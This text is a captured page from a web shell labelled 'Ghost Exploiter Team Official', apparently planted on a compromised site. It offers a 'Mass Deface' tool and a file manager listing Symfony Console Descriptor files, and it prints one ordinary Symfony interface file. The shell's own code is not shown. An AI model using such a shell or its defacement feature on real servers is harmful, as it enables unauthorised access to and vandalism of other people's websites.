webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
symfony
/
console
/
Descriptor
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
ApplicationDescription.php
3.743KB
edt
ren
Descriptor.php
2.593KB
edt
ren
DescriptorInterface.php
0.579KB
edt
ren
JsonDescriptor.php
5.555KB
edt
ren
MarkdownDescriptor.php
6.235KB
edt
ren
ReStructuredTextDescrip
...
10.396KB
edt
ren
TextDescriptor.php
11.99KB
edt
ren
XmlDescriptor.php
9.547KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Console\Descriptor; use Symfony\Component\Console\Output\OutputInterface; /** * Descriptor interface. * * @author Jean-François Simon <contact@jfsimon.fr> */ interface DescriptorInterface { /** * @return void */ public function describe(OutputInterface $output, object $object, array $options = []); }